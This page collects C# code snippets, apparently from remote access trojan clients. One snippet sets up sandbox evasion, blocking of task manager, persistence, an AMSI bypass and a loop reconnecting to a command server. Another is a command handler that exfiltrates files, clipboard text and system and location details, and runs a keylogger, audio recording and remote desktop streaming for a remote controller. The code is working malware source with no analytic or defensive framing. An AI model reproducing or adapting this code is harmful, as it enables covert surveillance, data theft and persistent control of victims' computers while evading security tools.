Esempio n. 1
0
        public static void Main()
        {
            for (int i = 0; i < Convert.ToInt32(Settings.De_lay); i++)
            {
                Thread.Sleep(1000);
            }

            if (!Settings.InitializeSettings())
            {
                Environment.Exit(0);
            }

            try
            {
                if (Convert.ToBoolean(Settings.An_ti)) //run anti-virtual environment
                {
                    Anti_Analysis.RunAntiAnalysis();
                }
                if (!MutexControl.CreateMutex()) //if current payload is a duplicate
                {
                    Environment.Exit(0);
                }
                if (Convert.ToBoolean(Settings.Anti_Process)) //run AntiProcess
                {
                    AntiProcess.StartBlock();
                }
                if (Convert.ToBoolean(Settings.BS_OD) && Methods.IsAdmin()) //active critical process
                {
                    ProcessCritical.Set();
                }
                if (Convert.ToBoolean(Settings.In_stall)) //drop payload [persistence]
                {
                    NormalStartup.Install();
                }
                Methods.PreventSleep(); //prevent pc to idle\sleep

                if (Methods.IsAdmin())
                {
                    Methods.ClearSetting();
                }
                Amsi.Bypass();
            }
            catch { }

            while (true) // ~ loop to check socket status
            {
                try
                {
                    if (!ClientSocket.IsConnected)
                    {
                        ClientSocket.Reconnect();
                        ClientSocket.InitializeClient();
                    }
                }
                catch { }
                Thread.Sleep(5000);
            }
        }
Esempio n. 2
0
 //Starts or stops anti-process (task manager, etc.)
 private void ToggleAntiProcess()
 {
     if (!APActive)
     {
         APActive = true;
         AntiProcess.StartBlock();
         List <byte> ToSend = new List <byte>();
         ToSend.Add((int)DataType.NotificationType);
         ToSend.AddRange(Encoding.ASCII.GetBytes("Started Anti-Process."));
         Networking.MainClient.Send(ToSend.ToArray());
     }
     else if (APActive)
     {
         APActive = false;
         AntiProcess.StopBlock();
         List <byte> ToSend = new List <byte>();
         ToSend.Add((int)DataType.NotificationType);
         ToSend.AddRange(Encoding.ASCII.GetBytes("Stopped Anti-Process."));
         Networking.MainClient.Send(ToSend.ToArray());
     }
 }
Esempio n. 3
0
        private static void HandleData(byte[] RawData)
        {
            if (ReceivingFile)
            {
                try
                {
                    File.WriteAllBytes(FileToWrite, RawData);
                    string Directory = CurrentDirectory;
                    if (Directory.Equals("BaseDirectory"))
                    {
                        Directory = Path.GetPathRoot(Environment.SystemDirectory);
                    }
                    string        Files = string.Empty;
                    DirectoryInfo DI    = new DirectoryInfo(Directory);
                    foreach (var F in DI.GetDirectories())
                    {
                        Files += "][{" + F.FullName + "}<" + "Directory" + ">[" + F.CreationTime + "]";
                    }
                    foreach (FileInfo F in DI.GetFiles())
                    {
                        Files += "][{" + Path.GetFileNameWithoutExtension(F.FullName) + "}<" + F.Extension + ">[" +
                                 F.CreationTime + "]";
                    }
                    List <byte> ToSend = new List <byte>();
                    ToSend.Add(5); //File List Type
                    ToSend.AddRange(Encoding.ASCII.GetBytes(Files));
                    Networking.MainClient.Send(ToSend.ToArray());
                    ToSend.Clear();
                    ToSend.Add(1); //Notification Type
                    ToSend.AddRange(
                        Encoding.ASCII.GetBytes("The file " + Path.GetFileName(FileToWrite) + " was uploaded."));
                    Networking.MainClient.Send(ToSend.ToArray());
                }
                catch
                {
                }

                ReceivingFile = false;
                return;
            }
            string StringForm = string.Empty;

            try
            {
                StringForm = Encoding.ASCII.GetString(RawData);
                Console.WriteLine("Command Recieved From " + ClientSettings.DNS + "   (" + StringForm + ")");
            }
            catch
            {
            }

            if (StringForm == "KillClient")
            {
                if (ChatThread.ThreadState == ThreadState.Running)
                {
                    CloseChatForm();
                }
                UninstallClient();
                try
                {
                    Process.GetCurrentProcess().Kill();
                } catch { Environment.Exit(0); }
            }
            else if (StringForm == "DisconnectClient")
            {
                Networking.MainClient.Disconnect();
            }
            else if (StringForm == "ShowClientConsole")
            {
                var handle = GetConsoleWindow();
                ShowWindow(handle, SW_SHOW);
                List <byte> ToSend = new List <byte>();
                ToSend.Add(1); //Notification Type
                ToSend.AddRange(Encoding.ASCII.GetBytes("Console has been shown to client."));
                Networking.MainClient.Send(ToSend.ToArray());
            }
            else if (StringForm.Contains("MsgBox"))
            {
                string            ToBreak      = GetSubstringByString("(", ")", StringForm);
                string            Text         = GetSubstringByString("<", ">", ToBreak);
                string            Header       = GetSubstringByString("[", "]", ToBreak);
                string            ButtonString = GetSubstringByString("{", "}", ToBreak);
                string            IconString   = GetSubstringByString("/", @"\", ToBreak);
                MessageBoxButtons MBB          = MessageBoxButtons.OK;
                MessageBoxIcon    MBI          = MessageBoxIcon.None;

                #region Button & Icon conditional statements

                if (ButtonString.Equals("Abort Retry Ignore"))
                {
                    MBB = MessageBoxButtons.AbortRetryIgnore;
                }
                else if (ButtonString.Equals("OK"))
                {
                    MBB = MessageBoxButtons.OK;
                }
                else if (ButtonString.Equals("OK Cancel"))
                {
                    MBB = MessageBoxButtons.OKCancel;
                }
                else if (ButtonString.Equals("Retry Cancel"))
                {
                    MBB = MessageBoxButtons.RetryCancel;
                }
                else if (ButtonString.Equals("Yes No"))
                {
                    MBB = MessageBoxButtons.YesNo;
                }
                else if (ButtonString.Equals("Yes No Cancel"))
                {
                    MBB = MessageBoxButtons.YesNoCancel;
                }

                if (IconString.Equals("Asterisk"))
                {
                    MBI = MessageBoxIcon.Asterisk;
                }
                else if (IconString.Equals("Error"))
                {
                    MBI = MessageBoxIcon.Error;
                }
                else if (IconString.Equals("Exclamation"))
                {
                    MBI = MessageBoxIcon.Exclamation;
                }
                else if (IconString.Equals("Hand"))
                {
                    MBI = MessageBoxIcon.Hand;
                }
                else if (IconString.Equals("Information"))
                {
                    MBI = MessageBoxIcon.Information;
                }
                else if (IconString.Equals("None"))
                {
                    MBI = MessageBoxIcon.None;
                }
                else if (IconString.Equals("Question"))
                {
                    MBI = MessageBoxIcon.Question;
                }
                else if (IconString.Equals("Stop"))
                {
                    MBI = MessageBoxIcon.Stop;
                }
                else if (IconString.Equals("Warning"))
                {
                    MBI = MessageBoxIcon.Warning;
                }

                #endregion Button & Icon conditional statements

                MessageBox.Show(Text, Header, MBB, MBI);
            }
            else if (StringForm.Equals("StartRD"))
            {
                RemoteDesktopStream.Start();
            }
            else if (StringForm.Equals("StopRD"))
            {
                RemoteDesktopStream.Stop();
            }
            else if (StringForm.Equals("GetProcesses"))
            {
                Process[]     PL          = Process.GetProcesses();
                List <string> ProcessList = new List <string>();
                foreach (Process P in PL)
                {
                    ProcessList.Add("{" + P.ProcessName + "}<" + P.Id + ">[" + P.MainWindowTitle + "]");
                }
                string[]    StringArray = ProcessList.ToArray <string>();
                List <byte> ToSend      = new List <byte>();
                ToSend.Add(3); //Process List Type
                string ListString = "";
                foreach (string Process in StringArray)
                {
                    ListString += "][" + Process;
                }
                ToSend.AddRange(Encoding.ASCII.GetBytes(ListString));
                Networking.MainClient.Send(ToSend.ToArray());
            }
            else if (StringForm.Contains("EndProcess("))
            {
                string ToEnd = GetSubstringByString("(", ")", StringForm);
                try
                {
                    Process P    = Process.GetProcessById(Convert.ToInt16(ToEnd));
                    string  Name = P.ProcessName;
                    P.Kill();
                    List <byte> ToSend = new List <byte>();
                    ToSend.Add(1); //Notification Type
                    ToSend.AddRange(Encoding.ASCII.GetBytes("The process " + P.ProcessName + " was killed."));
                    Networking.MainClient.Send(ToSend.ToArray());
                }
                catch
                {
                }
            }
            else if (StringForm.Contains("OpenWebsite("))
            {
                string ToOpen = GetSubstringByString("(", ")", StringForm);
                try
                {
                    Process.Start(ToOpen);
                }
                catch
                {
                }

                List <byte> ToSend = new List <byte>();
                ToSend.Add(1); //Notification Type
                ToSend.AddRange(Encoding.ASCII.GetBytes("The website " + ToOpen + " was opened."));
                Networking.MainClient.Send(ToSend.ToArray());
            }
            else if (StringForm.Equals("GetComputerInfo"))
            {
                string        ListString       = "";
                List <string> ComputerInfoList = new List <string>();
                ComputerInfo.GetGeoInfo();
                ComputerInfoList.Add("Computer Name: " + ComputerInfo.GetName());
                ComputerInfoList.Add("Computer CPU: " + ComputerInfo.GetCPU());
                ComputerInfoList.Add("Computer GPU: " + ComputerInfo.GetGPU());
                ComputerInfoList.Add("Computer Ram Amount (MB): " + ComputerInfo.GetRamAmount());
                ComputerInfoList.Add("Computer Antivirus: " + ComputerInfo.GetAntivirus());
                ComputerInfoList.Add("Computer OS: " + ComputerInfo.GetWindowsVersion());
                ComputerInfoList.Add("Country: " + ComputerInfo.GeoInfo.Country);
                ComputerInfoList.Add("Region Name: " + ComputerInfo.GeoInfo.RegionName);
                ComputerInfoList.Add("City: " + ComputerInfo.GeoInfo.City);
                foreach (string Info in ComputerInfoList.ToArray())
                {
                    ListString += "," + Info;
                }
                List <byte> ToSend = new List <byte>();
                ToSend.Add(4); //Information Type
                ToSend.AddRange(Encoding.ASCII.GetBytes(ListString));
                Networking.MainClient.Send(ToSend.ToArray());
            }
            else if (StringForm.Equals("RaisePerms"))
            {
                Process P = new Process();
                P.StartInfo.FileName        = ExecutablePath;
                P.StartInfo.UseShellExecute = true;
                P.StartInfo.Verb            = "runas";
                List <byte> ToSend = new List <byte>();
                ToSend.Add(1); //Notification Type
                ToSend.AddRange(Encoding.ASCII.GetBytes("Client is restarting in administration mode."));
                P.Start();
                Networking.MainClient.Send(ToSend.ToArray());
                Environment.Exit(0);
            }
            else if (StringForm.Contains("GetDF{"))
            {
                try
                {
                    string Directory = GetSubstringByString("{", "}", StringForm);
                    if (Directory.Equals("BaseDirectory"))
                    {
                        Directory = Path.GetPathRoot(Environment.SystemDirectory);
                    }
                    string        Files = string.Empty;
                    DirectoryInfo DI    = new DirectoryInfo(Directory);
                    foreach (var F in DI.GetDirectories())
                    {
                        Files += "][{" + F.FullName + "}<" + "Directory" + ">[" + F.CreationTime + "]";
                    }
                    foreach (FileInfo F in DI.GetFiles())
                    {
                        Files += "][{" + Path.GetFileNameWithoutExtension(F.FullName) + "}<" + F.Extension + ">[" +
                                 F.CreationTime + "]";
                    }
                    List <byte> ToSend = new List <byte>();
                    ToSend.Add(5); //File List Type
                    ToSend.AddRange(Encoding.ASCII.GetBytes(Files));
                    Networking.MainClient.Send(ToSend.ToArray());
                    CurrentDirectory = Directory;
                    ToSend.Clear();
                    ToSend.Add(6); //Current Directory Type
                    ToSend.AddRange(Encoding.ASCII.GetBytes(CurrentDirectory));
                    Networking.MainClient.Send(ToSend.ToArray());
                }
                catch
                {
                }
            }
            else if (StringForm.Contains("GoUpDir"))
            {
                try
                {
                    List <byte> ToSend = new List <byte>();
                    ToSend.Add(7); //Directory Up Type
                    CurrentDirectory = Directory.GetParent(CurrentDirectory).ToString();
                    ToSend.AddRange(Encoding.ASCII.GetBytes(CurrentDirectory));
                    Networking.MainClient.Send(ToSend.ToArray());
                }
                catch
                {
                }
            }
            else if (StringForm.Contains("GetFile"))
            {
                try
                {
                    string FileString = GetSubstringByString("{", "}", StringForm);
                    byte[] FileBytes;
                    using (FileStream FS = new FileStream(FileString, FileMode.Open))
                    {
                        FileBytes = new byte[FS.Length];
                        FS.Read(FileBytes, 0, FileBytes.Length);
                    }

                    List <byte> ToSend = new List <byte>();
                    ToSend.Add(8); //File Type
                    ToSend.AddRange(FileBytes);
                    Networking.MainClient.Send(ToSend.ToArray());
                }
                catch (Exception EX)
                {
                    List <byte> ToSend = new List <byte>();
                    ToSend.Add(1);
                    ToSend.AddRange(Encoding.ASCII.GetBytes("Error Downloading: " + EX.Message + ")"));
                    Networking.MainClient.Send(ToSend.ToArray());
                }
            }
            else if (StringForm.Contains("StartFileReceive{"))
            {
                try
                {
                    FileToWrite = GetSubstringByString("{", "}", StringForm);
                    var Stream = File.Create(FileToWrite);
                    Stream.Close();
                    ReceivingFile = true;
                }
                catch
                {
                }
            }
            else if (StringForm.Contains("TryOpen{"))
            {
                string ToOpen = GetSubstringByString("{", "}", StringForm);
                try
                {
                    Process.Start(ToOpen);
                    List <byte> ToSend = new List <byte>();
                    ToSend.Add(1); //Notification Type
                    ToSend.AddRange(Encoding.ASCII.GetBytes("The file " + Path.GetFileName(ToOpen) + " was opened."));
                    Networking.MainClient.Send(ToSend.ToArray());
                }
                catch
                {
                }
            }
            else if (StringForm.Contains("DeleteFile{"))
            {
                try
                {
                    string ToDelete = GetSubstringByString("{", "}", StringForm);
                    File.Delete(ToDelete);
                    List <byte> ToSend = new List <byte>();
                    ToSend.Add(1); //Notification Type
                    ToSend.AddRange(
                        Encoding.ASCII.GetBytes("The file " + Path.GetFileName(ToDelete) + " was deleted."));
                    Networking.MainClient.Send(ToSend.ToArray());
                    string Directory = CurrentDirectory;
                    if (Directory.Equals("BaseDirectory"))
                    {
                        Directory = Path.GetPathRoot(Environment.SystemDirectory);
                    }
                    string        Files = string.Empty;
                    DirectoryInfo DI    = new DirectoryInfo(Directory);
                    foreach (var F in DI.GetDirectories())
                    {
                        Files += "][{" + F.FullName + "}<" + "Directory" + ">[" + F.CreationTime + "]";
                    }
                    foreach (FileInfo F in DI.GetFiles())
                    {
                        Files += "][{" + Path.GetFileNameWithoutExtension(F.FullName) + "}<" + F.Extension + ">[" +
                                 F.CreationTime + "]";
                    }
                    ToSend.Clear();
                    ToSend.Add(5); //File List Type
                    ToSend.AddRange(Encoding.ASCII.GetBytes(Files));
                    Networking.MainClient.Send(ToSend.ToArray());
                }
                catch
                {
                }
            }
            else if (StringForm.Equals("GetClipboard"))
            {
                try
                {
                    string ClipboardText = "Clipboard is empty or contains an invalid data type.";
                    Thread STAThread     = new Thread(
                        delegate()
                    {
                        if (Clipboard.ContainsText(TextDataFormat.Text))
                        {
                            ClipboardText = Clipboard.GetText(TextDataFormat.Text);
                        }
                    });
                    STAThread.SetApartmentState(ApartmentState.STA);
                    STAThread.Start();
                    STAThread.Join();
                    List <byte> ToSend = new List <byte>();
                    ToSend.Add(9); //Clipboard Text Type
                    ToSend.AddRange(Encoding.ASCII.GetBytes(ClipboardText));
                    Networking.MainClient.Send(ToSend.ToArray());
                }
                catch
                {
                }
            }
            else if (StringForm.Equals("StartUsageStream"))
            {
                HardwareUsageStream.Start();
            }
            else if (StringForm.Equals("StopUsageStream"))
            {
                HardwareUsageStream.Stop();
            }
            else if (StringForm.Equals("StartKL"))
            {
                KeyloggerStream.Start();
            }
            else if (StringForm.Equals("StopKL"))
            {
                KeyloggerStream.Stop();
            }
            else if (StringForm.Equals("StartAR"))

            {
                if (!ARActive)
                {
                    RecordAudio();
                }
            }
            else if (StringForm.Equals("StopAR"))
            {
                if (ARActive)
                {
                    StopRecordAudio();
                }
            }
            else if (StringForm.Equals("OpenChat"))
            {
                if (!CActive)
                {
                    CActive = true;
                    CI      = new ChatInterface();
                    ChatThread.Start();
                }
            }
            else if (StringForm.Equals("CloseChat"))
            {
                if (CActive)
                {
                    CActive = false;
                    Networking.ChatClosing = true;
                    Thread.Sleep(200);
                    CloseChatForm();
                }
            }
            else if (StringForm.Contains("[<MESSAGE>]"))
            {
                Networking.CurrentMessage = StringForm.Replace("[<MESSAGE>]", "");
            }
            else if (StringForm.Equals("ToggleAntiProcess"))
            {
                if (!APDisabled)
                {
                    APDisabled = true;
                    AntiProcess.StartBlock();
                    List <byte> ToSend = new List <byte>();
                    ToSend.Add(1); //Notification Type
                    ToSend.AddRange(Encoding.ASCII.GetBytes("Started Anti-Process."));
                    Networking.MainClient.Send(ToSend.ToArray());
                }
                else if (APDisabled)
                {
                    APDisabled = false;
                    AntiProcess.StopBlock();
                    List <byte> ToSend = new List <byte>();
                    ToSend.Add(1); //Notification Type
                    ToSend.AddRange(Encoding.ASCII.GetBytes("Stopped Anti-Process."));
                    Networking.MainClient.Send(ToSend.ToArray());
                }
            }
        }